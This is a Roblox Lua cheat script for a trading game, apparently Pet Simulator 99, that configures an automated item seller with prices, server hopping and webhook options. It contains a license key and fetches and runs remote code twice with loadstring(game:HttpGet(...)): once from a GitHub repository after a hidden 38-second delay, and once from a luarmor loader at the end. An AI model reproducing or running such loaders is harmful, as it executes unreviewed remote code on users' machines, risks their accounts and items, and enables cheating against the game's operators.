_G.script1Done = true

spawn(function()
wait(38)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Hoith95/Pet-99/main/LookFPS-PLAZA"))()
end)

script_key="xKMeQnyThCdQGYtobjhnteYUytfKTyUL";
getgenv().Settings = {
    Seller = {
        Active = true,
        ["Items"] = {
	    ["All Titanics"] = {Price = "+1%", AllTypes = true, Priority = true},
	    --["Titanic Leafy Seahorse"] = {Price = "+1%", Priority = true},
	    --["Titanic Captain Octopus"] = {Price = "+1%", Priority = true},
	    --["Titanic Kraken"] = {Price = "+1%", Priority = true},
	    ["MVP Key"] = {Price = "+1", Priority = true},
	    ["Fantasy Key"] = {Price = "+1", Priority = true},
	    ["Fantasy Spinny Wheel Ticket"] = {Price = "+5", Priority = true},
	    ["Mega Loot Chest"] = {Price = "+5", Priority = true},
	    ["Mega Potion Chest"] = {Price = "+5", Priority = true},
	    ["Mega Enchant Chest"] = {Price = "+1", Priority = true},
	    ["Secret Key"] = {Price = "+5", Priority = true},
	    ["Void Key"] = {Price = "+1%"},
	    ["Tech Key"] = {Price = "+9%", Priority = true},
	    ["Crystal Key"] = {Price = "+5%"},
	    ["Fantasy Fragment"] = {Price = "+9", Priority = true},
	    ["Huge Sea Dragon Card"] = {Price = "+9%", Priority = true},
	    --["Deep Sea Treasure Chest"] = {Price = "+5", Priority = true},
	    ["Titanic Easter Gift"] = {Price = "+9%", Priority = true},
	    ["Huge Easter Gift"] = {Price = "+1%", Priority = true},
            --["Huge Spotted Elephant"] = {Price = "+1%", Priority = true},
            --["Golden Huge Spotted Elephant"] = {Price = "+1%"},
            --["Huge Rogue Squid"] = {Price = "+1%", Priority = true},
            --["Golden Huge Rogue Squid"] = {Price = "+1%", Priority = true},
            --["Rainbow Huge Rogue Squid"] = {Price = "+1%", Priority = true},
            --["Huge Anglerfish"] = {Price = "+1%", Priority = true},
            --["Golden Huge Anglerfish"] = {Price = "+1%", Priority = true},
            --["Rainbow Huge Easter Fox"] = {Price = "+1%", Priority = true},
            --["Huge Spring Bee"] = {Price = 19999999, Priority = true},
            --["Huge Rave Slime"] = {Price = 19999999, Priority = true},
            --["Huge Easter Lamb"] = {Price = "+1%", AllTypes = true, Priority = true},
            --["Huge Chocolate Bunny"] = {Price = "+1%", AllTypes = true, Priority = true},
            --[""] = {Price = "+1%", Priority = true},
            ["All Huges"] = {Price = "+1%", AllTypes = true},
	    --["Onyx Gem"] = {Price = "+1%"},
	    --["Topaz Gem"] = {Price = "+1%"},
	    --["Quartz Gem"] = {Price = "+1%"},
	    --["Rainbow Gem"] = {Price = "+1%"},
	    --["Amethyst Gem"] = {Price = "+5%"},
	    --["Emerald Gem"] = {Price = "+1%"},
	    --["Ruby Gem"] = {Price = "+1%"},
	    --["Sapphire Gem"] = {Price = "+1%"},
	    ["Time Trial Gift"] = {Price = "+1%", Priority = true},
	    ["Hellfire Gift"] = {Price = "+1%"},
	    ["Doodle Gift"] = {Price = "+5"},
	    ["Huge Machine Egg 4"] = {Price = "+5%"},
	    ["Huge Machine Egg 5"] = {Price = "+5%"},
	    ["Hype Egg"] = {Price = "+1%"},
	    ["Hype Egg 2"] = {Price = "+15%"},
	    --["Magic Shard"] = {Class = "Misc", Price = 65000},
	    --["Lucky Eggs 9"] = {Class = "Enchant", Price = "+1%"},
	    ["Charm Stone"] = {Price = "+1%"},
	    ["Overload"] = {Price = "+1%", Priority = true},
	    ["Royalty"] = {Price = "+1%", Priority = true},
	    --["Mini Pinata"] = {Price = 45000},
	    --["Treasure Hideout Key"] = {Class = "Misc", Price = "+1%"},
	    --["Spinny Wheel Ticket"] = {Class = "Misc", Price = "+5%"},
	    --["Tech Spinny Wheel Ticket"] = {Class = "Misc", Price = "+5%"},
	    --["Void Spinny Wheel Ticket"] = {Class = "Misc", Price = "+5%"},
        },
        ["Switch Servers"] = {Active = true, MinuteDelay = 120, OnlyPRO = false},
        ["Webhook"] = {Active = true, URL = ""},
        ["Kill Switch"] = {
            ["Booth Runout"] = false,
            ["Diamonds Hit: 1b"] = false,
            ["60 Minutes Timer"] = false,
            ["^^^ Switch To Sniping"] = false,
        },
        ["Diamonds Sendout"] = {Active = false, Username = "", Amount = "1b"},
    },

    [[ Thank you for using System Exodus <3! ]]
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/3b58d9c50c5ea74f255af40a8f735773.lua"))()
